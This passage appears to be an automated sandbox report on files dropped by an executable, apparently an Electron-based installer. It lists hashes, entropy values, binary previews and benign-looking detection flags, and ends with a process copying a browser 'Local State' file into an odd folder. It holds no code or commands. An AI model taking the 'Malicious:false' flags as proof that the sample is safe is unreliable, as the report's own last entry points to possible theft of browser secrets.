                                                                                                                                                                      SHA-256:54324671A161F6D67C790BFD29349DB2E2D21F5012DC97E891F8F5268BDF7E22
                                                                                                                                                                      SHA-512:F4E1DA71CB0485851E8EBCD5D5CF971961737AD238353453DB938B4A82A68A6BBAF3DE7553F0FF1F915A0E6640A3E54F5368D9154B0A4AD38E439F5808C05B9F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:............h.....i.....j.....k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.,...|.2...}.D.....L.....Q.....Y.....a.....i.....p.....w.....~...................................!.....K.....d.....m.............................P.....R.....V.....~...................................%.....F.........................................1.....S.....y.............................!.....8.....Q.....[.....k.....{.............................A.....n.........................................(.....H.....l.....x.......................&.....=.........................................A.....D.....i.............................'...........1.....2.....B.....T.....f.....y.............................+.................$.....~...................................$.....R.......................<.....w.............................E.....u......... .....".....%.....(.....*.{...+.~...,.........../.....0. ...1.....3.....4.....5.....6.Z...7.}...8.....9.....;.....<.....=.....>.I...?.X...@.y...A.....C.1...D.J.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\ur.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):617109
                                                                                                                                                                      Entropy (8bit):5.143761316646653
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:LbeI8PzGSEiyqkAXsA5rzTExbWW7mQYrjuUco/9NjjFpvIx:LbDwz5qWK
                                                                                                                                                                      MD5:FF0A23974AEF88AFC86ECC806DBF1D60
                                                                                                                                                                      SHA1:E7BAE97CBB8692A0D106644DFAA9B7D7EA6FCEF0
                                                                                                                                                                      SHA-256:F245AB242AAFEEF37DB736C780476534FAD0706AA66DCB8B6B8CD181B4778385
                                                                                                                                                                      SHA-512:AABE8160FAC7E0EB8E8EB80963FE995FA4A802147D1B8F605BC0FE3F8E2474463C1D313471C11C85EB5578112232FDC8E89B8A6D43DBE38A328538FF30A78D08
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........S...h.....i.....j.....k.+...l.6...n.>...o.C...p.P...r.V...s.g...t.p...v.....w.....y.....z.....|.....}.........................................................................v...............................................!.....c...............................................3.....Z.....g.............................:.....a.....k.....~.......................+.....\.....f.....y.........................................(.....J.....x.......................7.....F.....N.....U.....i...................................P.....c.....}.................(.....X.....g...............................................!.....?.....].....~.....................................................W.................C.............................!.....=.....C.....Q.....e.....k.......................^.......................+.....7.....L.....e............... .....".....%.....(.....*.K...+.N...,.l........./.....0.....1.....3.1...4.^...5.....6.....7.....8.S...9.l...;.....<.....=.....>.....?.....@.....A.....C.W.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\vi.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):488196
                                                                                                                                                                      Entropy (8bit):5.7988900625034185
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:gzLBn6cDgszBm0JXbwS1LcxzIJj758+UIi0+UELbzi830l:gpdDgsz00JrwSNizS5Hti0+UUvi830l
                                                                                                                                                                      MD5:3FE6F90F1F990AED508DEDA3810CE8C2
                                                                                                                                                                      SHA1:3B86F00666D55E984B4ACA1A5E8319FFA8F411FF
                                                                                                                                                                      SHA-256:5EEBB23221AEBCF0BE01BFC2695F7DD35B17F6769BE1E28E5610D35C9717854B
                                                                                                                                                                      SHA-512:9AA9D55F112C8B32AA636086CFD2161D97EA313CAC1A44101014128124A03504C992AC8EFD265ABA4E91787AEF7134A14507A600F5EC96FF82DF950A8883828C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:............h.j...i.....j.....k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.!...}.3.....;.....@.....H.....P.....X....._.....f.....m.....n.....o.....q...............................................(.....2.....Y.....x.....z.....~................................... .....+.....D.....t...........................................................5.....L.....V.....a.....r...........................................................T.....q.................................................................o...................................<.....P.....[.....i.....|.........................................#.....:.....A.....D.....E.....N.....W.....c.....m.......................4.....C.....................................................2.....=....._.............................4.....i....................................... .....".....%.....(.E...*.j...+.m...,.........../.....0.....1.....3.....4.*...5.?...6.y...7.....8.....9.....;.....<.....=.....>.....?.'...@.I...A.u...C...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\zh-CN.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):354097
                                                                                                                                                                      Entropy (8bit):6.680890808929274
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:gchsAAfyrtJw99jEaZx79+vKK4/+kTme5zBNCJ7GAmlv:gAAfyrtJAoaZ+vKK4/ye5zBNCJ7C
                                                                                                                                                                      MD5:20F315D38E3B2EDC5832931E7770B62A
                                                                                                                                                                      SHA1:2390BD585DEC1E884873454BB98B6F1467DCF7BB
                                                                                                                                                                      SHA-256:53A803724BBF2E7F40AAB860325C348F786EECA1EA5CA39A76B4C4A616E3233F
                                                                                                                                                                      SHA-512:C338E241DE3561707C7C275B7D6E0FB16185A8CD7112057C08B74FFCE122148EF693FE310C839FF93F102726A78E61DE3E68C8E324F445A07A98EE9C4FDD4E13
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..........?.h.....i.....j.....k.&...l.-...m.5...o.;...p.@...r.F...s.W...t.`...v.u...w.....|.....}...............................................................................%.....1.....C.....I.....\.....s.....y.....................................................#...../.....G.....S....._.................................................................+.....:.....@.....I.....[.....m.....s.....y...............................................$.....0.....6.....>.....E.....Q.....].....i............................................... .....D.....b.....q.....w............................................................................. .....5.....>.....G.....M.....W.....a.............................K.....].....o.................................................................,.....>.....g............................................. .....".....%.....(.)...*.>...+.A...,.n........./.....0.....1.....3.....4.....5.....6.N...7.c...8.x...9.....;.....<.....=.....>.....?.....@.....A.P...C.w...D...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\locales\zh-TW.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):350032
                                                                                                                                                                      Entropy (8bit):6.69437398216595
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:BiwxICJkrCU2JLuRyMD+4qz5MHzCtMkZ/9ybT1:BiyS0pMD+4qz5MHzd6/o
                                                                                                                                                                      MD5:524711882CBFB5B95A63EF48F884CFF0
                                                                                                                                                                      SHA1:1078037687CFC5D038EEB8B63D295239E0EDC47A
                                                                                                                                                                      SHA-256:9E16499CD96A155D410C8DF4C812C52FF2A750F8C4DB87FD891C1E58C1428C78
                                                                                                                                                                      SHA-512:16D45A81F7F4606EDA9D12A8B1DA06E3C866B11BDC0C92A4022BFB8D02B885D8F028457CF23E3F7589DFD191ED7F7FBC68C81B6E1411834EDFCBC9CC85E0DC4D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..........\.h.....i.....j.....k.....l.....n.....o.....p.....r.....s.-...t.6...v.K...w.X...y.^...z.m...|.s...}..................................................................................... .....8.....N.....Z.....m...........................................................!.....*.....6.....S.....`.....l.....~.......................................................................#.....)...../.....5.....M.....\.....k.....}.............................................................................'.....T.....`.....l.....................................................,...../.....;.....M....._.....s.............................................................................I.....v.....|...............................................!.....'.....-.....?.....i.....................................................$.....8.....A... .M..."._...%.z...(.....*.....+.....,.........../.....0.....1.@...3.Q...4.i...5.....6.....7.....8.....9.....;.....<.....=.-...>.F...?.P...@.e...A.....C.....D...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\resources.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):5245458
                                                                                                                                                                      Entropy (8bit):7.995476669559971
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:98304:HLYxfQVcnNWz49PDq2AwpmqdhBh1Dd42cjrwrbHw4o0DPelwG3RC:H0pQGcMButuBhpd4jkrU4oeelrRC
                                                                                                                                                                      MD5:7D5065ECBA284ED704040FCA1C821922
                                                                                                                                                                      SHA1:095FCC890154A52AD1998B4B1E318F99B3E5D6B8
                                                                                                                                                                      SHA-256:A10C3D236246E001CB9D434A65FC3E8AA7ACDDDDD9608008DB5C5C73DEE0BA1F
                                                                                                                                                                      SHA-512:521B2266E3257ADAA775014F77B0D512FF91B087C2572359D68FFE633B57A423227E3D5AF8EE4494538F1D09AA45FFA1FE8E979814178512C37F7088DDD7995D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:............f.......P'....$*.....-...43@...4.H...4XK...4i]...4.f...4.m...4?p...4.v...4.x...4.z...4.~...4....4.....4?....4.....4....4.....4=....4z....4a....4....4....4.....4.....4.....43....4.....4.....4J....4J....4.....4.....4#....4j....4J....5.....5....v5.:..w5.;..x5.<..y5.>..z5a?...5.?...5.D...5.E...5dJ...5.O...5.V...5.f...5.w...5.x...5.|..n<&...x<....y<....z<....{<....|<....<+....<r....<8....</....<....V@....W@....X@x...Y@d...Z@....[@2...\@O...]@....^@...._@hh..`@....<A....=A.....P.~...Pe....PX....P.....P.....Pt....P.....P3....Q.....QF....Q.....Q.....Q.....Q[....QA....Q.....Q.....QW....Q.....Qv....Q9!...Q.'...QF....Q.1..,Q.F..-QsL...QLN../Q.P..0Q.U..1Q.i..2Q.j..3Q.k..4QEm..5Q.o..6Q.r..7Q~t..8QEw..9Q!x..:Q.z..;Ql...<Q)...=Q....>Q ...?Q"....R....Ry....}.....}. ...}._...}%a...}[h...}.h...}[j...}Lo...}....}.&...}.....}.6...}4;...}.=...}&B...}mG...~.O...~.d...~.q...~.t...~.|...~.}..!~...."~....#~...$~|...&~....'~A...(~....)~....*~t$..+~.4..,~.6..-~V8...~.;../~i<..0~|=..1~iA..2~.H

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\resources\app.asar

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):9070864
                                                                                                                                                                      Entropy (8bit):5.6305464135693875
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:49152:rn9CyBK3UK9tUv3UuAdFUnBUecSHNXC4215nL2S26L82ELcAJvsvRRvy4vS716D3:ryUkL
                                                                                                                                                                      MD5:194DB70CB795D8B9354688791DF0F49C
                                                                                                                                                                      SHA1:46F6B9B83C8C71C9B957B7D3AECDA421DA6E7A9A
                                                                                                                                                                      SHA-256:4DBA203171920316A3F78C343F210360F3827A26467234B0DAB3B0FA3206259F
                                                                                                                                                                      SHA-512:E160536043AB6F6BE17041BCE35065A98C4FA96801F6530C72B7AB16136C73F7093E35184CBA366C1D3EE1C2D66CD8102932D7F2730A1148CE1FE0F04895C96C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:....L+..H+..D+..{"files":{"node_modules":{"files":{"@isaacs":{"files":{"cliui":{"files":{"LICENSE.txt":{"size":731,"integrity":{"algorithm":"SHA256","hash":"2dc0465729366c3a7890dfa9e972a1ba7048a26c02116fb8b419a6a1ac110149","blockSize":4194304,"blocks":["2dc0465729366c3a7890dfa9e972a1ba7048a26c02116fb8b419a6a1ac110149"]},"offset":"0"},"build":{"files":{"index.cjs":{"size":10398,"integrity":{"algorithm":"SHA256","hash":"820aa357a7f6a022bfc3ac6ac19d1681921d0421cae898d5096423c0fb3b8607","blockSize":4194304,"blocks":["820aa357a7f6a022bfc3ac6ac19d1681921d0421cae898d5096423c0fb3b8607"]},"offset":"731"},"index.d.cts":{"size":1050,"integrity":{"algorithm":"SHA256","hash":"385fceba2f49ee3f91cd436d3f84b389375e1e8f86906b23f47df2e1b9c2b17b","blockSize":4194304,"blocks":["385fceba2f49ee3f91cd436d3f84b389375e1e8f86906b23f47df2e1b9c2b17b"]},"offset":"11129"},"lib":{"files":{"index.js":{"size":10100,"integrity":{"algorithm":"SHA256","hash":"e67b3446f47d4a672339c99bea9e987979da9fc70f421701814cb9d52ba176

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\resources\elevate.exe

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):107520
                                                                                                                                                                      Entropy (8bit):6.442687067441468
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:1bLnrwQoRDtdMMgSXiFJWcIgUVCfRjV/GrWl:1PrwRhte1XsE1l
                                                                                                                                                                      MD5:792B92C8AD13C46F27C7CED0810694DF
                                                                                                                                                                      SHA1:D8D449B92DE20A57DF722DF46435BA4553ECC802
                                                                                                                                                                      SHA-256:9B1FBF0C11C520AE714AF8AA9AF12CFD48503EEDECD7398D8992EE94D1B4DC37
                                                                                                                                                                      SHA-512:6C247254DC18ED81213A978CCE2E321D6692848C64307097D2C43432A42F4F4F6D3CF22FB92610DFA8B7B16A5F1D94E9017CF64F88F2D08E79C0FE71A9121E40
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..O..............h.......j.q.....k.....e......e......e.......zR........._...h......h.f.............h......Rich....................PE..L......W............................l........0....@.......................................@....................................P.......x.......................T.......p...............................@............0..$............................text............................... ..`.rdata...k...0...l..................@..@.data...............................@....gfids..............................@..@.rsrc...x...........................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\snapshot_blob.bin

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):273328
                                                                                                                                                                      Entropy (8bit):3.2521181832662194
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:MpeVehd7eASb6iAGm4hmWRSJTnBSki+TfUNp2Zg+TEJ0xEI2tWaw8MCZ72T04GO9:YdyNm4mWRSJTBSXsU1vJzbYB
                                                                                                                                                                      MD5:8915DD2A6D6B4EBF9A16C77FE063D8DE
                                                                                                                                                                      SHA1:A03132ADCB99A82BA269D56AB6577CCFD1BB08E5
                                                                                                                                                                      SHA-256:C1802B29B13663A8890031411270866834246931F71F41397682DD88FA16D485
                                                                                                                                                                      SHA-512:ABD93CDD634AD4D38B7E3714B183335CDDB9E3AD14660247CC7285066C95342AC8595D68CD0868B8512E73BB656AB54386045533F998576B2CD6501BF456CD2C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:............11.2.214.9-electron.0............................................;...b...........:..a........a........a........ar.......a........a..............Y.D............`$.........D............`$.......D............`$.......m.D............`$.........D............`D.........D............`$.......1.D............`$.......D............`$.......D............`$.........D............`$.......D............`$......ID............`$.......D............`$.......D............`$....(Jb....I.....@..F^......`.....(Jb....M.....@..F^..`.....H...IDa........D`....D`....D`.......D`.....D]D....D`......WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa............L.............................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\v8_context_snapshot.bin

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):588152
                                                                                                                                                                      Entropy (8bit):4.83735352889622
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:bFzofuYUahtcOm3A0Tg8zY8y4XrxXSIIBYgHi:JMfu/fTY8zrM9C7
                                                                                                                                                                      MD5:4CD37EA771EA4FE2F3AD46217CC02206
                                                                                                                                                                      SHA1:31680E26869B007E62550E96DBF846B3980D5B2B
                                                                                                                                                                      SHA-256:95F7B8664306DA8D0073A795E86590ED6FDAEDE5F489132E56C8779F53CF1ED5
                                                                                                                                                                      SHA-512:E1369734CBE17AAF6DD3CEEFB57F056C5A9346D2887A7D3EE7ED177386D7F5E624407869D53902B56AB350E4DED5612C3B0F52C2DD3EFA307E9947701068A2A0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.........c~.11.2.214.9-electron.0...........................................H...P<..........X...........a........a........aT.......ar.......a........a..............Y.D............`$.........D............`$.......D............`$.......m.D............`$.........D............`D.........D............`$.......1.D............`$.......D............`$.......D............`$.........D............`$.......D............`$......ID............`$.......D............`$.......D............`$....(Jb....I.....@..F^......`.....(Jb....M.....@..F^..`.....H...IDa........D`....D`....D`.......D`.....D]D....D`......WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa............L.....................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\vk_swiftshader.dll

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):5334528
                                                                                                                                                                      Entropy (8bit):6.335261874351837
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:98304:RKJSTu+985EkjstvgsnpkkHF3y/AFIB7:RQq85EkjstvgsnpkkJETB
                                                                                                                                                                      MD5:524B0D85D992F86A7F26C162F3DBB91C
                                                                                                                                                                      SHA1:BC9C862FD01F6134A0514DCB63F9FAB7A61CE269
                                                                                                                                                                      SHA-256:5B2FFB78FA963F2DEA5A7FCF7676FC3ABA243C4372D7528C8F1FC8F726D0A3FA
                                                                                                                                                                      SHA-512:422A18AF294D7551224E05F5F4F5DCFA51B3455C2E61FC285FD2B95B50274EB77FF317647E17B0E7D47459B4FED19C7C88C90E0878F2269A78D598B1196401D8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........." ......A..........;.......................................R...........`A..........................................L.~...&.L.P....`R.......P.<_...........pR.X}...L.......................L.(...@.A.@.............L.P............................text.....A.......A................. ..`.rdata...(....A..*....A.............@..@.data...p.....M.......M.............@....pdata..<_....P..`...LO.............@..@.00cfg..8.....Q.......P.............@..@.gxfg....,....R.......P.............@..@.retplne.....0R.......P..................tls....Q....@R.......P.............@..._RDATA..\....PR.......P.............@..@.rsrc........`R.......P.............@..@.reloc..X}...pR..~....P.............@..B................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\vk_swiftshader_icd.json

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):106
                                                                                                                                                                      Entropy (8bit):4.724752649036734
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:YD96WyV18tzsmyXLVi1rTVWSCwW2TJHzeZ18rY:Y8WyV18tAZLVmCwXFiZ18rY
                                                                                                                                                                      MD5:8642DD3A87E2DE6E991FAE08458E302B
                                                                                                                                                                      SHA1:9C06735C31CEC00600FD763A92F8112D085BD12A
                                                                                                                                                                      SHA-256:32D83FF113FEF532A9F97E0D2831F8656628AB1C99E9060F0332B1532839AFD9
                                                                                                                                                                      SHA-512:F5D37D1B45B006161E4CEFEEBBA1E33AF879A3A51D16EE3FF8C3968C0C36BBAFAE379BF9124C13310B77774C9CBB4FA53114E83F5B48B5314132736E5BB4496F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"file_format_version": "1.0.0", "ICD": {"library_path": ".\\vk_swiftshader.dll", "api_version": "1.0.5"}}

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\vulkan-1.dll

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):928256
                                                                                                                                                                      Entropy (8bit):6.558092096809165
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24576:IEW7F7IyaHx/fempu2e6Z5WODYsHh6g3P0zAk7o:e7IyaBfempa6Z5WODYsHh6g3P0zAk7
                                                                                                                                                                      MD5:6D4ADF9A48DBCE2E480EF10B1338CA3C
                                                                                                                                                                      SHA1:CEB77D5768C6EDA84EC8E0B43821B8027764DE81
                                                                                                                                                                      SHA-256:4CCA7E6C05B2D988926E4B4D0C8FF91D6356F18DE8BF40B440251180E5CAD6A7
                                                                                                                                                                      SHA-512:106DB7309B40AFABB1CCA911B204C83129683DC116AEC198568C4228C581BF0DE5963BFFC0B50DF8F43EC355264F271FC383F4155BE45350C0D7DD429C7F7F09
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........." ......................................................................`A........................................H...<!......P...............<o..............T...t.......................X...(...@...@............................................text............................... ..`.rdata..............................@..@.data....L...p... ...V..............@....pdata..<o.......p...v..............@..@.00cfg..8....0......................@..@.gxfg...P(...@...*..................@..@.retplne.....p...........................tls................................@..._RDATA..\...........................@..@.rsrc...............................@..@.reloc..T...........................@..B................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\System.dll

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):12288
                                                                                                                                                                      Entropy (8bit):5.719859767584478
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:1enY0LWelt70elWjvfstJcVtwtYbjnIOg5AaDnbC7ypXhtIj:18PJlt70esj0Mt9vn6ay6
                                                                                                                                                                      MD5:0D7AD4F45DC6F5AA87F606D0331C6901
                                                                                                                                                                      SHA1:48DF0911F0484CBE2A8CDD5362140B63C41EE457
                                                                                                                                                                      SHA-256:3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
                                                                                                                                                                      SHA-512:C07DE7308CB54205E8BD703001A7FE4FD7796C9AC1B4BB330C77C872BF712B093645F40B80CE7127531FE6746A5B66E18EA073AB6A644934ABED9BB64126FEA9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....~.\...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\app-64.7z

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:7-zip archive data, version 0.4
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):64468182
                                                                                                                                                                      Entropy (8bit):7.999994985636421
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1572864:Njdd/VTld+qlxzJ3LXkQ/eCsYlATxy5YUtrxWL:1/xldB/zJ7P/bsFTxy5YUtrQL
                                                                                                                                                                      MD5:46D98564861CD93E91D370DD44FB782B
                                                                                                                                                                      SHA1:E1F7E73BA879395E82934C2BB03673ADEBC1D81C
                                                                                                                                                                      SHA-256:655BC61EE7C8277433C3C90F8B56D57D5244856755A40845701B81F77719EA56
                                                                                                                                                                      SHA-512:801AC8BC0659D3388B79EB246B21C508F0A6DBE96F25C915E16613DC235989EE8D9035227B653EC57D7234DCC5916FA53488EAA0175AAE2B77DC83F77A5CEB1D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:7z..'...;.&@........%........`....R..]...6...#k.![y.`.Gr#.f..F......./.t..C..8.^..k .....@..........ih..w*.`.c...I...;.R.A`../_.Q:..yn........6...a {.f_.....>..`..Nu.....q/..H...hsIhA.5..... .9.[...L./.(.^.+Vz@.Dt7OZI.z.N...~;].rW..k......s...^<i ...w.`3.}............T.Z.v.m..W8..m...........k..8..w+.8..9N.C......._; ..u.J........i43.d.......`....r."O.E...'.{h....'....$.M.$..Y....&.+.r|T....aF.T.9...&..sh....I..;.qP.Y..........V..^..P.:...D.."..@Cw...%8.h.5....6V/0..]....%7.Z.P..w..J..].....M..^......+..BMZ..&..}.6l..hT..t).?2....1...F..H..+...0.s.}.S.-x;...f.b}....8.R.@.....r.....Ib......$(/^XdI..46G..Q....`......h..H.U......p..[.Sa-Q@G.......h!....Z....2$.^.IqZ...~~CUB..#.nAp5.k..K....O".G.(......N...>`.k.....;.~A.X.e.mzUq.L...o..PH..WxfRH..z..dT!."d.W.4...Tx... ..Y<..1.P.#.W..Z7.f.z.R...u6.......C.+?.....p.d........".<.../h.Y..`u<m.y.u.Lh.Fz...#...F).,..G.~..'..Mx.s:3..V..m..[%.B.V[...V.Id_.~i6..$...H.ywyg.D.lA.`.H..+..X..@H....

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\nsis7z.dll

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):434176
                                                                                                                                                                      Entropy (8bit):6.584811966667578
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:aUWQQ5O3fz0NG3ucDaEUTWfk+ZA0NrCL/k+uyoyBOX1okfW7w+Pfzqibckl:an5QEG39fPAkrE4yrBOXDfaNbck
                                                                                                                                                                      MD5:80E44CE4895304C6A3A831310FBF8CD0
                                                                                                                                                                      SHA1:36BD49AE21C460BE5753A904B4501F1ABCA53508
                                                                                                                                                                      SHA-256:B393F05E8FF919EF071181050E1873C9A776E1A0AE8329AEFFF7007D0CADF592
                                                                                                                                                                      SHA-512:C8BA7B1F9113EAD23E993E74A48C4427AE3562C1F6D9910B2BBE6806C9107CF7D94BC7D204613E4743D0CD869E00DAFD4FB54AAD1E8ADB69C553F3B9E5BC64DF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L.6a..X2..X2..X2m.[3..X2m.]3..X2Z.]3+.X2Z.\3..X2Z.[3..X2m.\3..X2m.Y3..X2..Y2..X2..\3#.X2..]3..X2..X3..X2...2..X2...2..X2..Z3..X2Rich..X2........PE..L.....\...........!......................... ...............................@............@..........................6.......7..d................................E.....................................@............ ...............................text............................... ..`.rdata..8"... ...$..................@..@.data........P... ...6..............@....rsrc................V..............@..@.reloc...E.......F...Z..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Roaming\hgekorcpiasneymc\Local State (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe
                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):389
                                                                                                                                                                      Entropy (8bit):5.622621949828896
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:YKWSg99rrt+f70OAzkP/tXiPLVayaHWRnGX1:YKWfrrtozAzgSPLVayaHW5A
                                                                                                                                                                      MD5:C5A13312836B5591B4FDD0F18FB17873
                                                                                                                                                                      SHA1:E103F6BD20DA9F30C4064F55F1AF9B5192B815BD
